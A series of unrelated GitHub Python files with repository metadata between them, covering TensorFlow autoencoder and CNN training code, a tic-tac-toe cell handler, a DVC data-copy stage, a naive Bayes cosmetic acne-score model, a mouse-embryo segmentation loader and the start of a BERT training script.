"""Fit the model to the data.
Parameters
----------
train_X : array_like, shape (n_samples, n_features)
Training data.
train_Y : array_like, shape (n_samples, n_features)
Training reference data.
val_X : array_like, shape (N, n_features) optional, (default = None).
Validation data.
val_Y : array_like, shape (N, n_features) optional, (default = None).
Validation reference data.
graph : tf.Graph, optional (default = None)
Tensorflow Graph object.
Returns
-------
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
# Build model
self.build_model(train_X.shape[1])
with tf.Session() as self.tf_session:
# Initialize tf stuff
summary_objs = tf_utils.init_tf_ops(self.tf_session)
self.tf_merged_summaries = summary_objs[0]
self.tf_summary_writer = summary_objs[1]
self.tf_saver = summary_objs[2]
# Train model
self._train_model(train_X, train_Y, val_X, val_Y)
# Save model
self.tf_saver.save(self.tf_session, self.model_path)
def transform(self, data, graph=None):
"""Transform data according to the model.
Parameters
----------
data : array_like, shape (n_samples, n_features)
Data to transform.
graph : tf.Graph, optional (default = None)
Tensorflow Graph object
Returns
-------
array_like, transformed data
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
feed = {self.input_data: data, self.keep_prob: 1}
return self.encode.eval(feed)
def reconstruct(self, data, graph=None):
"""Reconstruct data according to the model.
Parameters
----------
data : array_like, shape (n_samples, n_features)
Data to transform.
graph : tf.Graph, optional (default = None)
Tensorflow Graph object
Returns
-------
array_like, transformed data
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
feed = {self.input_data: data, self.keep_prob: 1}
return self.reconstruction.eval(feed)
def score(self, data, data_ref, graph=None):
"""Compute the reconstruction loss over the test set.
Parameters
----------
data : array_like
Data to reconstruct.
data_ref : array_like
Reference data.
Returns
-------
float: Mean error.
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
feed = {
self.input_data: data,
self.input_labels: data_ref,
self.keep_prob: 1
}
return self.cost.eval(feed)
|
gabrieleangeletti/Deep-Learning-TensorFlow
|
yadlt/core/unsupervised_model.py
|
unsupervised_model.py
|
py
| 4,251 |
python
|
en
|
code
| 965 |
github-code
|
6
|
11545903852
|
import modules.processing_turn as m_turn
import modules.data_base as m_data
def click_cell(x,y):
# Умова першого рядка таблиці
if y < 100 and y > 0:
# Умова першої комірки по х
if x > -100 and x < 0 and m_data.list_cells[0] == 0:
m_turn.who_turn(-100, 100, 0)
# Умова другої комірки по х
elif x < 100 and x > 0 and m_data.list_cells[1] == 0:
m_turn.who_turn(0, 100, 1)
# Умова третьої комірки по х
elif x > 100 and x < 200 and m_data.list_cells[2] == 0:
m_turn.who_turn(100, 100, 2)
# Умова другого рядка таблиці
elif y < 0 and y > -100:
# Умова четвертої комірки по х
if x > -100 and x < 0 and m_data.list_cells[3] == 0:
m_turn.who_turn(-100, 0, 3)
# Умова п'ятої комірки по х
elif x < 100 and x > 0 and m_data.list_cells[4] == 0:
m_turn.who_turn(0, 0, 4)
# Умова шостої комірки по х
elif x > 100 and x < 200 and m_data.list_cells[5] == 0:
m_turn.who_turn(100, 0, 5)
# Умова третього рядка таблиці
elif y < -100 and y > -200:
if x > -100 and x < 0 and m_data.list_cells[6] == 0:
m_turn.who_turn(-100,-100,6)
elif x < 100 and x > 0 and m_data.list_cells[7] == 0:
m_turn.who_turn(0, -100, 7)
elif x > 100 and x < 200 and m_data.list_cells[8] == 0:
m_turn.who_turn(100, -100, 8)
|
BoiarkinaOryna/cross_zero_game
|
modules/checking_square_coordinates.py
|
checking_square_coordinates.py
|
py
| 1,655 |
python
|
uk
|
code
| 0 |
github-code
|
6
|
10701337998
|
import tensorflow as tf
import re
import time, datetime
import os
import data_helper
TOWER_NAME = 'tower'
class CNNClassify(object):
"""CNN图像分类
"""
def __init__(self, batch_size, num_classes, num_train_examples, initial_lr=0.1, lr_decay_factor=0.1,
moving_average_decay=0.9999, num_epochs_per_decay=300, log_frequency=10,
max_steps=200000, checkpoint_every=5000, num_gpus=4, session_conf=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True,
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.3))):
self.batch_size = batch_size
self.num_classes = num_classes
self.moving_average_decay = moving_average_decay # 用于移动平均的衰减
self.initial_lr = initial_lr # 最初的学习速率
self.lr_decay_factor = lr_decay_factor # 学习速率衰减因子
self.num_epochs_per_decay = num_epochs_per_decay # 多少轮衰减一次
self.num_train_examples = num_train_examples # 训练样本数量
self.log_frequency = log_frequency # 多少步控制台打印一次结果
self.max_steps = max_steps
self.checkpoint_every = checkpoint_every # 多少步之后保存一次模型
self.num_checkpoints = 5
self.num_gpus = num_gpus
self.session_conf = session_conf
def _variable_on_cpu(self, name, shape, initializer):
"""帮助创建存储在CPU内存上的变量。"""
with tf.device('/cpu:0'):
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def _variable_with_weight_decay(self, name, shape, stddev, wd):
"""初始化权重变量
Args:
name: name of the variable
shape: list of ints
stddev: 高斯函数标准差
wd: 添加L2范数损失权重衰减系数。如果没有,该变量不添加重量衰减。
Returns:权重变量
"""
dtype = tf.float32
var = self._variable_on_cpu(name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def _activation_summary(self, x):
"""创建tensorboard摘要 好可视化查看
"""
tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.summary.histogram(tensor_name + '/activations', x)
tf.summary.scalar(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def average_gradients(self, tower_grads):
"""计算所有tower上所有变量的平均梯度
"""
average_grads = []
for grad_and_vars in zip(*tower_grads):
# 每个梯度和变量类似这样:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# 添加一个0维度来代表tower [grad0_gpuN]
expanded_g = tf.expand_dims(g, 0)
# [[grad0_gpu1],...,[grad0_gpuN]]
grads.append(expanded_g)
# 在tower上进行平均 (上面加维度那部分没理解 加了又合 不是白操作吗?,后续再研究一下)
grad = tf.concat(axis=0, values=grads) # [grad0_gpu1,..., grad0_gpuN]
grad = tf.reduce_mean(grad, 0) # 平均梯度
# 把变量拼接回去
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def inference(self, images):
"""向前传播
"""
# 第一层卷积
with tf.variable_scope('conv1') as scope:
kernel = self._variable_with_weight_decay('weights', shape=[5, 5, 3, 64], stddev=5e-2, wd=0.0) # 权值矩阵
# 二维卷积
conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME') # 周围补0 保持形状不变
biases = self._variable_on_cpu('biases', [64], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(pre_activation, name=scope.name) # relu激活
self._activation_summary(conv1)
# pool1 最大池化
pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
# norm1 增加一个LRN处理,可以增强模型的泛化能力
norm1 = tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
# 第二层卷积
with tf.variable_scope('conv2') as scope:
kernel = self._variable_with_weight_decay('weights', shape=[5, 5, 64, 64], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(norm1, kernel, [1, 1, 1, 1], padding='SAME')
biases = self._variable_on_cpu('biases', [64], tf.constant_initializer(0.1))
pre_activation = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(pre_activation, name=scope.name)
self._activation_summary(conv2)
# 这次先进行LRN处理
norm2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm2')
# 最大池化
pool2 = tf.nn.max_pool(norm2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
# 全连接隐层 映射到384维向量
with tf.variable_scope('local3') as scope:
# 将前面的最大池化输出扁平化成一个单一矩阵 好做全连接
reshape = tf.reshape(pool2, [self.batch_size, -1])
dim = reshape.get_shape()[1].value
weights = self._variable_with_weight_decay('weights', shape=[dim, 384], stddev=0.04, wd=0.004)
biases = self._variable_on_cpu('biases', [384], tf.constant_initializer(0.1))
local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)
self._activation_summary(local3)
# 再接一个全连接层 映射到192维向量
with tf.variable_scope('local4') as scope:
weights = self._variable_with_weight_decay('weights', shape=[384, 192], stddev=0.04, wd=0.004)
biases = self._variable_on_cpu('biases', [192], tf.constant_initializer(0.1))
local4 = tf.nn.relu(tf.matmul(local3, weights) + biases, name=scope.name)
self._activation_summary(local4)
# 线性输出层 这里不做softmax 因为在损失函数内部执行了,那样效率更高
with tf.variable_scope('softmax_linear') as scope:
weights = self._variable_with_weight_decay('weights', [192, self.num_classes], stddev=1 / 192.0, wd=0.0)
biases = self._variable_on_cpu('biases', [self.num_classes], tf.constant_initializer(0.0))
softmax_linear = tf.add(tf.matmul(local4, weights), biases, name=scope.name)
self._activation_summary(softmax_linear)
return softmax_linear
def loss(self, logits, labels):
"""损失函数
"""
# Calculate the average cross entropy loss across the batch.
labels = tf.cast(labels, tf.int64)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits, name='cross_entropy_per_example')
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
tf.add_to_collection('losses', cross_entropy_mean)
# The total loss is defined as the cross entropy loss plus all of the weight
# decay terms (L2 loss).
return tf.add_n(tf.get_collection('losses'), name='total_loss')
def tower_loss(self, scope, logits, labels):
_ = self.loss(logits, labels)
# 把所有损失都集中到当前tower上
losses = tf.get_collection('losses', scope)
total_loss = tf.add_n(losses, name='total_loss')
for l in losses + [total_loss]:
# 去掉变量名前缀 tower_[0-9],变成和单GPU的时候一样
loss_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', l.op.name)
tf.summary.scalar(loss_name, l)
return total_loss
def evaluation(self, logits, labels, k=1):
"""评估函数
:param logits: 预测
:param labels: 标签
"""
correct = tf.nn.in_top_k(logits, labels, k=k)
# correct = tf.equal(self.predictions, tf.argmax(labels, 1))
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))
tf.add_to_collection('accuracy', accuracy)
return tf.add_n(tf.get_collection('accuracy'), name='accuracy')
def tower_evaluation(self, scope, logits, labels, k=1):
"""多gpu的评估函数
"""
_ = self.evaluation(logits, labels, k)
accuracy = tf.get_collection('accuracy', scope)
total_accuracy = tf.reduce_mean(accuracy, axis=0, name='total_accuracy')
return total_accuracy
def _add_loss_summaries(self, total_loss):
"""增加损失摘要
"""
# Compute the moving average of all individual losses and the total loss.
loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
losses = tf.get_collection('losses')
loss_averages_op = loss_averages.apply(losses + [total_loss])
# Attach a scalar summary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
# Name each loss as '(raw)' and name the moving average version of the loss
# as the original loss name.
tf.summary.scalar(l.op.name + ' (raw)', l)
tf.summary.scalar(l.op.name, loss_averages.average(l))
return loss_averages_op
def train_operation(self, total_loss, global_step):
"""训练操作
"""
num_batches_per_epoch = self.num_train_examples / self.batch_size # 每轮的批次数
decay_steps = int(num_batches_per_epoch * self.num_epochs_per_decay) # 多少步衰减
# 基于步数,以指数方式衰减学习率。
lr = tf.train.exponential_decay(self.initial_lr, global_step, decay_steps, self.lr_decay_factor, staircase=True)
tf.summary.scalar('learning_rate', lr)
# 损失移动平均
loss_averages_op = self._add_loss_summaries(total_loss)
with tf.control_dependencies([loss_averages_op]):
opt = tf.train.GradientDescentOptimizer(lr) # 优化器
grads = opt.compute_gradients(total_loss) # 梯度
# 应用梯度
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step) # 训练操作
# 为可训练的变量添加直方图
for var in tf.trainable_variables():
tf.summary.histogram(var.op.name, var)
# 为梯度添加直方图
for grad, var in grads:
if grad is not None:
tf.summary.histogram(var.op.name + '/gradients', grad)
# 跟踪所有可训练变量的移动平均线
variable_averages = tf.train.ExponentialMovingAverage(self.moving_average_decay, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
train_op = tf.no_op(name='train')
return train_op
def train_step(self, sess, summary_writer):
"""单步训练
"""
_, step, cur_loss, cur_acc = sess.run([self.train_op, self.global_step, self._loss, self.accuracy])
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g}".format(time_str, step, cur_loss, cur_acc))
# 存储摘要
if step % 100 == 0:
summary_str = sess.run(self.summary)
summary_writer.add_summary(summary_str, step)
summary_writer.flush()
def train(self, filename, out_dir):
"""训练
"""
with tf.Graph().as_default():
sess = tf.Session(config=self.session_conf)
with sess.as_default():
self.global_step = tf.contrib.framework.get_or_create_global_step()
with tf.device('/cpu:0'):
images, labels = data_helper.distorted_inputs(filename, self.batch_size)
logits = self.inference(images)
self._loss = self.loss(logits, labels)
self.train_op = self.train_operation(self._loss, self.global_step)
self.accuracy = self.evaluation(logits, labels)
self.summary = tf.summary.merge_all()
# 保存点设置
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model") # 模型存储前缀
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.num_checkpoints)
summary_writer = tf.summary.FileWriter(out_dir + "/summary", sess.graph)
# 初始化所有变量
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
saver.restore(sess, ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
tf.train.start_queue_runners(sess=sess)
for step in range(self.max_steps):
self.train_step(sess, summary_writer) # 训练
cur_step = tf.train.global_step(sess, self.global_step)
# checkpoint_every 次迭代之后 保存模型
if cur_step % self.checkpoint_every == 0 and cur_step != 0:
path = saver.save(sess, checkpoint_prefix, global_step=cur_step)
print("Saved model checkpoint to {}\n".format(path))
def multi_gpu_train(self, filename, out_dir):
with tf.Graph().as_default(), tf.device('/cpu:0'):
sess = tf.Session(config=self.session_conf)
with sess.as_default():
# Create a variable to count the number of train() calls. This equals the
# number of batches processed * FLAGS.num_gpus.
self.global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
# 学习速率衰减设置
num_batches_per_epoch = self.num_train_examples / self.batch_size
decay_steps = int(num_batches_per_epoch * self.num_epochs_per_decay)
# 根据步数衰减学习速率
lr = tf.train.exponential_decay(self.initial_lr, self.global_step, decay_steps, self.lr_decay_factor,
staircase=True)
# 执行梯度下降的优化器
opt = tf.train.GradientDescentOptimizer(lr)
images, labels = data_helper.distorted_inputs(filename, self.batch_size) # 取出数据
# 批次队列 这个函数不是很懂
batch_queue = tf.contrib.slim.prefetch_queue.prefetch_queue([images, labels], capacity=2 * self.num_gpus)
tower_grads = []
summaries = None
with tf.variable_scope(tf.get_variable_scope()):
for i in range(self.num_gpus):
with tf.device('/gpu:{}'.format(i)):
with tf.name_scope('{}_{}'.format(TOWER_NAME, i)) as scope:
# 为gpu列出一个批次
image_batch, label_batch = batch_queue.dequeue()
# 计算一个tower的损失. 并且每个tower共享权重变量
logits = self.inference(image_batch)
self._loss = self.tower_loss(scope, logits, label_batch)
self.accuracy = self.tower_evaluation(scope, logits, label_batch)
# 下一个tower复用变量
tf.get_variable_scope().reuse_variables()
# 保存最终tower的摘要
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
# 计算梯度
grads = opt.compute_gradients(self._loss)
# 跟踪所有tower的梯度
tower_grads.append(grads)
grads = self.average_gradients(tower_grads) # 平均梯度
# 添加学习速率的摘要
summaries.append(tf.summary.scalar('learning_rate', lr))
# 添加梯度直方图
for grad, var in grads:
if grad is not None:
summaries.append(tf.summary.histogram(var.op.name + '/gradients', grad))
# 应用梯度来调整共享变量
apply_gradient_op = opt.apply_gradients(grads, global_step=self.global_step)
# 所有可训练变量添加直方图
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram(var.op.name, var))
# 跟踪所有可训练变量的移动平均线
variable_averages = tf.train.ExponentialMovingAverage(self.moving_average_decay, self.global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
# 将所有更新集中到一个训练操作
self.train_op = tf.group(apply_gradient_op, variables_averages_op)
# 从最后的tower总结摘要
self.summary = tf.summary.merge(summaries)
# 保存点设置
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model") # 模型存储前缀
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.num_checkpoints)
summary_writer = tf.summary.FileWriter(out_dir + "/summary", sess.graph)
# 初始化所有变量
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
saver.restore(sess, ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
# 启动队列
tf.train.start_queue_runners(sess=sess)
for step in range(self.max_steps):
self.train_step(sess, summary_writer) # 训练
cur_step = tf.train.global_step(sess, self.global_step)
# checkpoint_every 次迭代之后 保存模型
if cur_step % self.checkpoint_every == 0 and cur_step != 0:
path = saver.save(sess, checkpoint_prefix, global_step=cur_step)
print("Saved model checkpoint to {}\n".format(path))
|
mikuh/tf_code
|
cnn/cnn_model.py
|
cnn_model.py
|
py
| 19,630 |
python
|
en
|
code
| 3 |
github-code
|
6
|
26807586503
|
from src.utils.all_utils import read_yaml, create_directory
import argparse
import os
import shutil
from tqdm import tqdm
import logging
log_string = "[%(asctime)s: %(levelname)s: %(module)s]: %(message)s"
logs_dir = "Logs"
os.makedirs(logs_dir,exist_ok=True)
logging.basicConfig(filename=os.path.join(logs_dir,"Running_Logs.log"),level=logging.INFO,format=log_string,filemode='a')
def copy_file(source_download_dir,local_data_dir):
source_files = os.listdir(source_download_dir)
N = len(source_files)
for file in tqdm(source_files,total=N,desc= f"Copying File from {source_download_dir} to {local_data_dir}", colour="green"):
src = os.path.join(source_download_dir,file)
dst = os.path.join(local_data_dir,file)
shutil.copy(src, dst)
def get_data(config_path):
config = read_yaml(config_path)
source_download_dirs = config["source_download_dirs"]
local_data_dirs = config["local_data_dirs"]
for source_download_dir,local_data_dir in tqdm(zip(source_download_dirs,local_data_dirs),total=2,desc= "List of Folders", colour="cyan"):
create_directory([local_data_dir])
copy_file(source_download_dir,local_data_dir)
if __name__ == '__main__':
args = argparse.ArgumentParser()
args.add_argument("--config", "-c", default="config/config.yaml")
parsed_args = args.parse_args()
try:
logging.info(">>>>>Stage-01 Started...")
get_data(config_path=parsed_args.config)
logging.info("Stage-01 Completed , Data saved into local Directory <<<<<<\n")
except Exception as e:
raise e
|
vicharapubhargav/dvc_tensorflow_demo
|
src/stage_01_load_save.py
|
stage_01_load_save.py
|
py
| 1,595 |
python
|
en
|
code
| 0 |
github-code
|
6
|
715415024
|
import pandas as pd
import pickle
def buildDataSet():
#Import Ingredients DF
print('Loaded Products...')
ewg_ing_df = pd.read_json('ingredients_products_keys_fixed/ewg_ingredients.json', orient = 'index')
#Build mapping between Ingredient ID and ingredient Name
ing_map = {}
for i in range(len(ewg_ing_df)):
ID = ewg_ing_df.iloc[i]['ingredient_id']
name = ewg_ing_df.iloc[i]['ingredient_name']
ing_map[ID] = name
#Read in Product Data and Initialize Acne Score
ewg_prd_df = pd.read_json('ingredients_products_keys_fixed/ewg_products.json', orient = 'index')
ewg_prd_df['Acne_Score'] = 0
print('Loaded ingredients')
#Build Lists of ingredients to modify original DataFrame and Initialize Dataset for Model
from collections import Counter
n = len(ewg_prd_df)
ing_lists = []
ing_cnts = Counter()
string_lists = []
for i in range(n):
try:
new_list = []
strings = ''
ing_list = ewg_prd_df.iloc[i]['ingredient_list']
for ID in ing_list:
new_list.append(ing_map[ID])
ing_cnts[ing_map[ID]] += 1
#strings = strings + ' ' + ing_map[ID]
#print(new_list)
ing_lists.append(new_list)
string_lists.append(str(new_list))
except:
ing_lists.append([''])
string_lists.append('')
print('Failed on',i, 'no ingredient list.')
print('Finished matching ingredients to keys.')
ewg_prd_df['New_List'] = ing_lists
#Build Synonym Dictionary
synonym_dict = {}
for i in range(ewg_ing_df.shape[0]):
row = ewg_ing_df.iloc[i]
syns = row['synonym_list']
if type(syns) == list:
for syn in syns:
synonym_dict[syn.strip()] = row['ingredient_name']
synonym_dict[row['ingredient_name']] = row['ingredient_name']
else:
synonym_dict[row['ingredient_name']] = row['ingredient_name']
print('Build Synonyms')
#Initialize Ingredient Score
ewg_ing_df['Acne_Score'] = 0.0
#Extract Comodegenic Scores
comodegenic = []
with open('comodegenic.csv','r') as f:
for line in f:
if line[0] != ',':
words = line.strip().split(',')
if words[1] != '':
comodegenic.append(( words[0], words[1], words[2]))
cd_df = pd.DataFrame(comodegenic)
#Match Comodegeic Ingredients to EWG
from fuzzywuzzy import fuzz
from fuzzywuzzy import process
matches = []
print('Matching Comodegenic to EWG...')
for i in range(cd_df.shape[0]):
cur_ingredient = cd_df.iloc[i][0].upper()
matches.append(process.extract(cur_ingredient, synonym_dict.keys(),limit=1, scorer=fuzz.token_sort_ratio))
#Match Comodegenic Ingredients to EWG
cd_ranks = []
stop
for i in range(cd_df.shape[0]):
match_score = int(matches[i][0][1])
match_name = matches[i][0][0]
cd_name = cd_df.iloc[i][0].upper()
cd_ranks.append(match_score)
if match_score >= 90:
ewg_name = synonym_dict[match_name]
#print(temp_score, '\t', match_name, '\t', cd_name, '\t', synonym_dict[match_name])
#print(cd_df.iloc[i][1],cd_df.iloc[i][0])
row= ewg_ing_df[ewg_ing_df['ingredient_name']==ewg_name].index
ewg_ing_df.loc[row,'Acne_Score'] = cd_df.iloc[i][1]
#print(ewg_ing_df.loc[row]['ingredient_name'], ewg_ing_df.loc[row]['Acne_Score'])
#print(ewg_ing_df[ewg_ing_df['ingredient_name']==ewg_name])
print('Updated EWG with Acne Scores')
#Update Product Acne Score
acne_score_list = []
for i in range(ewg_prd_df.shape[0]):
row = ewg_prd_df.iloc[i]
total_acne = 0
for ing in row['New_List']:
try:
acne_score = float(ewg_ing_df[ewg_ing_df['ingredient_name']==ing]['Acne_Score'])
#print(ing, acne_score)
total_acne += acne_score
except:
None
acne_score_list.append(total_acne)
#print(acne_score_list)
ewg_prd_df['Acne_Score'] = acne_score_list
#Save Final Acne Matrix
pickle_out = open("ewg_prd_df.pickle","wb")
pickle.dump(ewg_prd_df, pickle_out)
pickle_out.close()
print('Saved dataset to "ewg_prd_df.pickle"')
try:
pickle.load(open("ewg_prd_df.pickle","rb"))
print('Loaded from Pickle')
ewg_prd_df = pickle.load(open("ewg_prd_df.pickle","rb"))
except:
print("Building Dataset from Files...")
buildDataSet()
ewg_prd_df = pickle.load(open("ewg_prd_df.pickle","rb"))
#try:
# X = pickle.load(open("X.pickle","rb"))
#except:
#Need to change to a real function...code block simple
print('Building Dataset...')
#print(ewg_prd_df)
from collections import Counter
n = ewg_prd_df.shape[0]
print(n)
ing_lists = []
ing_cnts = Counter()
string_lists = []
for i in range(n):
ings = ewg_prd_df.iloc[i]['New_List']
str_list = ''
if type(ings) == list:
#print(type(ings), i)
for ing in ings:
if type(ing) == str:
str_list = str_list + '|' + ing
string_lists.append(str_list)
else:
print('Failed',i)
string_lists.append('')
#Build TD-IDF Matrix
from sklearn.feature_extraction.text import TfidfVectorizer
def ing_tokenizer(word):
return word.split('|')
#print(ewg_prd_df['New_List'].tolist())
vectorizer = TfidfVectorizer(tokenizer = ing_tokenizer, lowercase = False, stop_words = ['WATER','GLYCERIN','',
'TITANIUM DIOXIDE', 'IRON OXIDES','BEESWAX','METHYLPARABEN', 'PROPYLPARABEN', 'PROPYLENE GLYCOL', 'PANTHENOL', 'MICA'] )
X = vectorizer.fit_transform(string_lists)
#print(vectorizer.vocabulary_)
pickle_out = open("X.pickle","wb")
pickle.dump(X, pickle_out)
pickle_out.close()
#print(X)
print('Running Optimization...')
from sklearn.metrics import confusion_matrix
for thresh in [0]:
for test_size in [.001,.05,.01,.1]:
for alph in [.001]:
best_alpha = 0
best_test_size = 0
best_thresh_hold = 0
best_test_score = 0
best_train_score = 0
best_model = None
#Initialize Acne Score by Product
Y = []
for i in ewg_prd_df['Acne_Score']:
if i > 0 and i < 3:
Y.append(1)
elif i > 2:
Y.append(2)
else:
Y.append(0)
#Split Training and Test Data by 1/3 to 2/3
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=42)
#Build NB Model
from sklearn.naive_bayes import MultinomialNB
gnb = MultinomialNB(alpha = alph)
gnb_fit = gnb.fit(X_train,y_train)
y_pred = gnb_fit.predict(X_test)
#y_pred_tr = gnb_fit.predict(X_train)
test_score = confusion_matrix(y_test, y_pred)
#train_score = confusion_matrix(y_train, y_pred_tr)
#if test_score:
best_test_score = test_score
best_alpha = alph
best_test_size = test_size
best_thresh_hold = thresh
best_model = gnb_fit
print('Best Test Score:',gnb_fit.score(X_test,y_test), '\n', test_score) #,'\t', train_score)
print('Alpha:\t', best_alpha)
print('Test_size:\t',test_size)
print('Thresh:\t', thresh,'\n')
#print('Thresh:',thresh, 'TestSize\t',test_size,'\n' ,'\tTraining Error:', )
#print('\tTesting Error', )
pickle_out = open("nb.pickle","wb")
pickle.dump(gnb_fit, pickle_out)
pickle_out.close()
ingredient_weights = {}
i = 0
print(len(gnb.coef_), best_model.coef_, type(best_model.coef_[0]))
for i in range(gnb_fit.coef_[0].shape[0]):
#print( gnb.coef_[0][i], vectorizer.get_feature_names()[i])
ingredient_weights[vectorizer.get_feature_names()[i]] =(gnb.coef_[0][i])
#print(, gnb.coef_[i])
import operator
sorted_weights = sorted(ingredient_weights.items(), key=operator.itemgetter(1))
for i in range(1,20):
print(sorted_weights[-i])
score = best_model.predict_proba(X_train)
pred = best_model.predict(X_train)
for i in range(100):
print(ewg_prd_df.iloc[i]['Acne_Score'], score[i], pred[i])
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
#%matplotlib inline
ewg_prd_df['Acne_Score'].hist(bins=40)
plt.show()
#for i in range(gnb_fit.coef_
#print(gnb_fit.coef_)
#out = gnb_fit.predict_proba(X_test)
#for i in range(len(out)):
# print(out[i])
#print(gnb_fit.class_log_prior_)
#print(gnb_fit.feature_count_)
#print(gnb_fit.class_count_)
#print(gnb_fit.get_params())
|
SombiriX/w210_capstone
|
buildModel.py
|
buildModel.py
|
py
| 8,443 |
python
|
en
|
code
| 1 |
github-code
|
6
|
655729367
|
import os
from glob import glob
import torch_em
from . import util
URL = "https://zenodo.org/record/6546550/files/MouseEmbryos.zip?download=1"
CHECKSUM = "bf24df25e5f919489ce9e674876ff27e06af84445c48cf2900f1ab590a042622"
def _require_embryo_data(path, download):
if os.path.exists(path):
return
os.makedirs(path, exist_ok=True)
tmp_path = os.path.join(path, "mouse_embryo.zip")
util.download_source(tmp_path, URL, download, CHECKSUM)
util.unzip(tmp_path, path, remove=True)
# remove empty volume
os.remove(os.path.join(path, "Membrane", "train", "fused_paral_stack0_chan2_tp00073_raw_crop_bg_noise.h5"))
def get_mouse_embryo_dataset(
path,
name,
split,
patch_shape,
download=False,
offsets=None,
boundaries=False,
binary=False,
**kwargs,
):
"""Dataset for the segmentation of nuclei in confocal microscopy.
This dataset is stored on zenodo: https://zenodo.org/record/6546550.
"""
assert name in ("membrane", "nuclei")
assert split in ("train", "val")
assert len(patch_shape) == 3
_require_embryo_data(path, download)
# the naming of the data is inconsistent: membrane has val, nuclei has test;
# we treat nuclei:test as val
split_ = "test" if name == "nuclei" and split == "val" else split
file_paths = glob(os.path.join(path, name.capitalize(), split_, "*.h5"))
file_paths.sort()
kwargs, _ = util.add_instance_label_transform(
kwargs, add_binary_target=binary, binary=binary, boundaries=boundaries,
offsets=offsets, binary_is_exclusive=False
)
raw_key, label_key = "raw", "label"
return torch_em.default_segmentation_dataset(file_paths, raw_key, file_paths, label_key, patch_shape, **kwargs)
def get_mouse_embryo_loader(
path,
name,
split,
patch_shape,
batch_size,
download=False,
offsets=None,
boundaries=False,
binary=False,
**kwargs,
):
"""Dataloader for the segmentation of nuclei in confocal microscopy. See 'get_mouse_embryo_dataset' for details."""
ds_kwargs, loader_kwargs = util.split_kwargs(
torch_em.default_segmentation_dataset, **kwargs
)
dataset = get_mouse_embryo_dataset(
path, name, split, patch_shape,
download=download, offsets=offsets, boundaries=boundaries, binary=binary,
**ds_kwargs
)
loader = torch_em.get_data_loader(dataset, batch_size, **loader_kwargs)
return loader
|
constantinpape/torch-em
|
torch_em/data/datasets/mouse_embryo.py
|
mouse_embryo.py
|
py
| 2,459 |
python
|
en
|
code
| 42 |
github-code
|
6
|
72699334907
|
import pandas as pd
from sklearn.model_selection import train_test_split
from transformers import BertTokenizer, BertModel, AutoTokenizer, AutoModelForMaskedLM
from torch import nn
import numpy as np
from sklearn.model_selection import train_test_split, KFold, StratifiedKFold
from torch.optim import Adam
from tqdm import tqdm
import torch
import os
import logging
# **************读取数据和模型************
data = pd.read_csv("../dataset/train.csv")
data_part = data.sample(n=60000, random_state=42, replace=True)
data_shuffled = data_part.sample(frac=1, random_state=42) # 随机打乱数据
train_data, test_data = train_test_split(
